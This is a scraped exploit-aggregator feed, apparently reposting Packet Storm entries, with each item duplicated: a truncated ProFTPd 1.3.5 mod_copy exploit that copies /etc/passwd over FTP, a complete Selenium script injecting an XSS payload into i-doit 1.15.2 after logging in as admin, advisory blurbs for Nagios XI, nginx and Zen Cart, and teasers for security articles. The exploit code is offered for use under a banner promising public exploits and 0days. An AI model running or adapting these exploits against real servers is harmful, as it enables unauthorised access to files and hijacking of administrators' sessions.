Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
ProFTPd 1.3.5 Remote Command Execution
https://4.bp.blogspot.com/-yl8JZs3kPK0/WWlvOF1SUeI/AAAAAAAAIMk/jv5-1ECzklsqpq4rMFWFx2wFFGh-Q9GlwCLcBGAs/s1600/h24.png
ProFTPd version 1.3.5 remote command execution exploit. This is a variant of the original vulnerability discovered in 2015 with credit going to R-73eN.
MD5 |
Download
# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)
# Date: 25/05/2021
# Exploit Author: Shellbr3ak
# Version: 1.3.5
# Tested on: Ubuntu 16.04.6 LTS
# CVE : CVE-2015-3306
#!/usr/bin/env python3
import sys
import socket
import requests
def exploit(client, target):
client.connect((target,21)) # Connecting to the target server
banner = client.recv(74)
print(banner.decode())
client.send(b'site cpfr /etc/passwd\r\n')
print(client.recv(1024).decode())
client.send(b'site cpto
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
ProFTPd 1.3.5 Remote Command Execution
https://4.bp.blogspot.com/-yl8JZs3kPK0/WWlvOF1SUeI/AAAAAAAAIMk/jv5-1ECzklsqpq4rMFWFx2wFFGh-Q9GlwCLcBGAs/s1600/h24.png
ProFTPd version 1.3.5 remote command execution exploit. This is a variant of the original vulnerability discovered in 2015 with credit going to R-73eN.
MD5 |
65284b1eff912220e6161a800f3801c5Download
# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)
# Date: 25/05/2021
# Exploit Author: Shellbr3ak
# Version: 1.3.5
# Tested on: Ubuntu 16.04.6 LTS
# CVE : CVE-2015-3306
#!/usr/bin/env python3
import sys
import socket
import requests
def exploit(client, target):
client.connect((target,21)) # Connecting to the target server
banner = client.recv(74)
print(banner.decode())
client.send(b'site cpfr /etc/passwd\r\n')
print(client.recv(1024).decode())
client.send(b'site cpto
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
ProFTPd 1.3.5 Remote Command Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Nagios XI / Fusion Privilege Escalation / Cross Site Scripting / Code Execution
https://3.bp.blogspot.com/-_lYy5AwzHPI/WWlvAVk_lrI/AAAAAAAAIKU/HsTDdKCabVkkHkFsXQw08U72hOmjap5rACLcBGAs/s1600/h121.png
Skylight Cyber has identified a total of 13 vulnerabilities in Nagios XI and Nagios Fusion servers. These include remote code execution, cross site scripting, privilege escalation, and more.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Nagios XI / Fusion Privilege Escalation / Cross Site Scripting / Code Execution
https://3.bp.blogspot.com/-_lYy5AwzHPI/WWlvAVk_lrI/AAAAAAAAIKU/HsTDdKCabVkkHkFsXQw08U72hOmjap5rACLcBGAs/s1600/h121.png
Skylight Cyber has identified a total of 13 vulnerabilities in Nagios XI and Nagios Fusion servers. These include remote code execution, cross site scripting, privilege escalation, and more.
MD5 |
0f8ab86fe538d7650dcebc219968069cDownload
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Nagios XI / Fusion Privilege Escalation / Cross Site Scripting / Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
i-doit 1.15.2 Cross Site Scripting
https://3.bp.blogspot.com/-YTa6qox_ltk/WWlvNeWMUbI/AAAAAAAAIMc/0l9a_Kr-MFozVC5jeSwhLNgVZ9cZuXXlQCLcBGAs/s1600/h22.png
i-doit version 1.15.2 suffers from a cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
i-doit 1.15.2 Cross Site Scripting
https://3.bp.blogspot.com/-YTa6qox_ltk/WWlvNeWMUbI/AAAAAAAAIMc/0l9a_Kr-MFozVC5jeSwhLNgVZ9cZuXXlQCLcBGAs/s1600/h22.png
i-doit version 1.15.2 suffers from a cross site scripting vulnerability.
MD5 |
4760ac7ddc0a553330c79104c0530f02Download
# Exploit Title: SXX for i-doit 1.15.2 in parameret (viewMode) from Infrastructure
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty
# Date: 05.25.2021
# Vendor: https://www.i-doit.org/news/
# Link: https://www.i-doit.org/new-minor-release-i-doit-open-1-15-2/
# From Github:
https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3151/idoit-open-1.15.2.zip
# CVE: CVE-2021-3151 - NEW
# Proof: https://streamable.com/vofczm
[+] Exploit Source:
#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-3151
from selenium import webdriver
import time
import os, sys
# Vendor: https://www.i-doit.org/news/
website_link="http://192.168.1.160/?"
# enter your login username
username="admin"
# enter your login password
password="admin"
#enter the element for username input field
element_for_username="login_username"
#enter the element for password input field
element_for_password="login_password"
#enter the element for submit button
element_for_submit="login_submit"
#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users
time.sleep(1)
browser.get((website_link))
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
# Exploit XSS vulnerability parameter viewMode
time.sleep(3)
# Payload Parameter: "viewMode" (Infrastructure > catgID=41 == XSS
injection simbol{'})
browser.get(("
http://192.168.1.160/index.php?viewMode=1002&tvMode=1006&tvType=1&objID=26&catgID=41%27
"))
print("The payload is deployed now this is bad for the owner \;)\...\n")
except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Sorry, but something is wrong and this exploit is not working...")
## The exploit
## Vulnerable (Infrastructure) section
## Parameter:
viewMode (Infrastructure, Object, Network > local pots = XSS simbol{'})
- URL
http://192.168.1.2/?viewMode=1100&tvMode=1006&tvType=1&objID=26&catgID=41&objTypeID=19&cateID=1&editMode=1
## insert the payload into:
Title:
Description:
---------------------------------
# Exploit Title: SXX for i-doit 1.15.2 in parameret (viewMode) from
Infrastructure
# Date: 05.25.2021
# Exploit Authotr idea: @nu11secur1ty
# Exploit Debugging: @nu11secur1ty
# Vendor Homepage: https://www.i-doit.org/news/
# Software Link:
https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3151/idoit-open-1.15.2.zip
# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3151
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
i-doit 1.15.2 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
nginx 1.20.0 DNS Resolver Off-By-One Heap Write
___________________________
@hacking_Attack
@Hacking_Video
nginx 1.20.0 DNS Resolver Off-By-One Heap Write
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
nginx 1.20.0 DNS Resolver Off-By-One Heap Write
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Zen Cart 1.5.7 Cross Site Scripting
https://4.bp.blogspot.com/-hp3wB9AXd0k/WWlvDY5V44I/AAAAAAAAIKs/ScSIhWVAvDAhjeMkIwqbNby9r3gKQvOEgCLcBGAs/s1600/h128.png
Zen Cart version 1.5.7 suffers from a cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Zen Cart 1.5.7 Cross Site Scripting
https://4.bp.blogspot.com/-hp3wB9AXd0k/WWlvDY5V44I/AAAAAAAAIKs/ScSIhWVAvDAhjeMkIwqbNby9r3gKQvOEgCLcBGAs/s1600/h128.png
Zen Cart version 1.5.7 suffers from a cross site scripting vulnerability.
MD5 |
df30607df6a72933aa69d11199808bb8Download
Information
--------------------
Advisory by Netsparker
Name: Cross-Site Scripting Vulnerability in Zen Cart 1.5.7
Affected Software: Zen Cart
Affected Versions: 1.5.7
Homepage: https://www.zen-cart.com/
Vulnerability: Cross-Site Scripting
Severity: High
Status: Fixed
CVSS Score (3.0): AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Netsparker Advisory Reference: NS-21-002
Technical Details
--------------------
Zen Cart 1.5.7 was improperly sanitizing user input in HTTP GET parameter
names, which led to a Cross-Site Scripting (XSS) vulnerability in the admin
area. The impact of this vulnerability is lessened due to the fact that the
name of the admin panel must be set to a random or user-supplied name.
Resolution: The vulnerability is fixed in Zen Cart v1.5.7c.
Scope: It affected only users of Zen Cart v1.5.7, v1.5.7a, and v1.5.7b.
Fix: Users can consult the release announcement for guidance on applying
the patched files related to upgrading to v1.5.7c
For more information on cross-site scripting vulnerabilities read the
article Cross-site Scripting (XSS).
For more information:
https://www.netsparker.com/web-applications-advisories/ns-21-002-cross-site-scripting-in-zen-cart/
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Zen Cart 1.5.7 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Information gathering using DNS enumeration techniques and tools
https://cdn-images-1.medium.com/max/1200/1*yirQ9JBmE1CHApdVzf7BNQ.jpeg
When we talk about DNS enumeration, we generally refer to every technique we use to gather as much data as possible by querying the DNS…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Information gathering using DNS enumeration techniques and tools
https://cdn-images-1.medium.com/max/1200/1*yirQ9JBmE1CHApdVzf7BNQ.jpeg
When we talk about DNS enumeration, we generally refer to every technique we use to gather as much data as possible by querying the DNS…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Information gathering using DNS enumeration techniques and tools
When we talk about DNS enumeration, we generally refer to every technique we use to gather as much data as possible by querying the DNS…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
The Battle Between Ransomware, Researchers, and anti-virus Companies looking for attention
The Colonial pipeline ransomware hackers had a secret weapon: self-promoting cybersecurity firms — MIT Technology Review, Renee Dudley and…
Continue reading on Hybrid Analyst »
___________________________
@hacking_Attack
@Hacking_Video
The Battle Between Ransomware, Researchers, and anti-virus Companies looking for attention
The Colonial pipeline ransomware hackers had a secret weapon: self-promoting cybersecurity firms — MIT Technology Review, Renee Dudley and…
Continue reading on Hybrid Analyst »
___________________________
@hacking_Attack
@Hacking_Video
Medium
The Battle Between Ransomware, Researchers, and anti-virus Companies looking for attention
The Colonial pipeline ransomware hackers had a secret weapon: self-promoting cybersecurity firms — MIT Technology Review, Renee Dudley and…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Mobile AppSec: Security Considerations for Finalized Mobile App Distributables
https://cdn-images-1.medium.com/max/2600/0*tdGzM5EdLR7D9tLr
It is important to understand that mobile apps are client-side applications. Anyone with the final package binary/installable bundle can…
Continue reading on Walmart Global Tech Blog »
___________________________
@hacking_Attack
@Hacking_Video
Mobile AppSec: Security Considerations for Finalized Mobile App Distributables
https://cdn-images-1.medium.com/max/2600/0*tdGzM5EdLR7D9tLr
It is important to understand that mobile apps are client-side applications. Anyone with the final package binary/installable bundle can…
Continue reading on Walmart Global Tech Blog »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Mobile AppSec: Security Considerations for Finalized Mobile App Distributables
It is important to understand that mobile apps are client-side applications. Anyone with the final package binary/installable bundle can…